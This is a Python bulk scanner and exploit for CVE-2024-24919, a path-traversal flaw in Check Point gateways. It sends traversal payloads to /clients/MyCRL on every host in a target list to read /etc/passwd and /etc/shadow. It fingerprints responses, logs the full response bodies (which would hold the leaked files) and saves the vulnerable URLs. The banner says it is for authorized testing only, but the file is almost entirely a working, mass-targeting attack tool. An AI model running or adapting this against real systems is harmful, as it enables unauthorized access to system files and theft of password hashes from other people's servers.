CVE-2024-24919-auto.py
import argparse
import sys
import urllib.parse

import requests
import urllib3
from termcolor import colored

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
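# Global scan counters, updated by post_request() and displayed by update_progress().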
success_count = 0
fail_count = 0
timeout_count = 0
total_urls = 0
vulnerable_urls = []
def display_header():
    header = """
 ____
 ____ _____ ___ _/_ | ____
/ \\\\__ \\\\ \\/ /| |/ \\
| | \\/ __ \\\\ / | | | \\
|___| (____ /\\_/ |___|___| /
 \\/ \\/ \\/
"""
    info = """
[CVE-2024-24919] Bulk Scanner
Intended only for educational use and authorized testing in corporate environments.
https://twitter.com/nav1n0x/ and https://github.com/ifconfig-me take no responsibility for this code; use it at your own risk.
Do not attack a target you don't have permission to engage with.
"""
    print(colored(header, 'cyan'))
    print(colored(info, 'yellow'))
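
# A target is flagged only when the response matches the Check Point fingerprint
# below: all three expected headers plus a 200 status served over HTTP/1.0.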
def check_vulnerability(response):
    expected_headers = {
        'Server': 'Check Point SVN foundation',
        'X-UA-Compatible': 'IE=EmulateIE7',
        'X-Frame-Options': 'SAMEORIGIN'
    }
    match_count = sum(1 for k, v in expected_headers.items() if response.headers.get(k) == v)
    status_line_match = response.status_code == 200 and response.raw.version == 10  # HTTP/1.0
    return match_count >= 3 and status_line_match
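
# Appends the full request and either the response or the exception text to
# request-analyze.txt so individual probes can be reviewed after a run.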
def log_request(f, url, method, headers, data, response, is_exception=False):
    f.write(f"{method} /clients/MyCRL HTTP/1.1\n")
    for key, value in headers.items():
        f.write(f"{key}: {value}\n")
    if data:
        f.write(f"\n{data}\n")
    if is_exception:
        f.write(f"\nResponse: {response}\n")
    else:
        f.write("\nResponse Headers:\n")
        for key, value in response.headers.items():
            f.write(f"{key}: {value}\n")
        f.write(f"\nResponse Body:\n{response.text}\n")
    f.write("=" * 80 + "\n")
def get_hostname(url):
    # Falls back to the path component for bare hostnames given without a scheme.
    parsed_url = urllib.parse.urlparse(url)
    return parsed_url.netloc or parsed_url.path
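
# Probes a single target: POSTs each traversal payload to /clients/MyCRL and
# records the URL as vulnerable on the first fingerprint match.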
def post_request(url):
    global success_count, fail_count, timeout_count, vulnerable_urls
    hostname = get_hostname(url)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Connection": "close",
        "Host": hostname,
        "Content-Length": "39"  # both traversal payloads below are exactly 39 bytes
    }
    timeout = 3
    payloads = [
        "aCSHELL/../../../../../../../etc/passwd",
        "aCSHELL/../../../../../../../etc/shadow"
    ]
    is_vulnerable = False
    # Logging is for analysis purposes only - feel free to remove it.
    with open("request-analyze.txt", "a") as f:
        for data in payloads:
            try:
                post_response = requests.post(url + "/clients/MyCRL", headers=headers, data=data, timeout=timeout, verify=False)
                log_request(f, url, "POST", headers, data, post_response)
                if check_vulnerability(post_response):
                    is_vulnerable = True
                    success_count += 1
                    break
                else:
                    fail_count += 1
            except requests.exceptions.Timeout:
                timeout_count += 1
                log_request(f, url, "POST", headers, data, "Timeout", is_exception=True)
            except requests.exceptions.RequestException as e:
                fail_count += 1
                log_request(f, url, "POST", headers, data, str(e), is_exception=True)
    if is_vulnerable:
        vulnerable_urls.append(url)
        print(f"{colored(' Vulnerable URL found:', 'green')} {url}")
def process_urls_from_file(file_path):
    global total_urls
    with open(file_path, 'r') as file:
        urls = [line.strip() for line in file if line.strip()]  # skip blank lines
    total_urls = len(urls)
    for idx, url in enumerate(urls):
        if not url.startswith("https://"):
            url = "https://" + url
        post_request(url)
        update_progress(idx + 1)
    with open("checkpoint-results.txt", "w") as result_file:  # saves vulnerable URLs to a file
        for url in vulnerable_urls:
            result_file.write(url + "\n")
def update_progress(scanned):
    progress_message = f"{colored('Scanning:', 'yellow')} {scanned}/{total_urls} {colored('Success:', 'green')} {success_count}, {colored('Fail:', 'red')} {fail_count}, {colored('Timeout:', 'blue')} {timeout_count}"
    sys.stdout.write('\r' + progress_message)
    sys.stdout.flush()
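
# Usage: python CVE-2024-24919-auto.py -f targets.txt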
def main():
    display_header()
    parser = argparse.ArgumentParser(description="Scan URLs for vulnerabilities.")
    parser.add_argument('-f', '--file', type=str, required=True, help="Path to the file containing URLs")
    args = parser.parse_args()
    process_urls_from_file(args.file)
    # This part prints the vulnerable URLs at the end of the run. Feel free to
    # remove it for bulk lists, as a long dump can make your terminal unresponsive.
    print("\n\nVulnerable URLs:")
    for url in vulnerable_urls:
        print(url)

if __name__ == "__main__":
    main()
    # Ensure the final output ends on a new line
    print()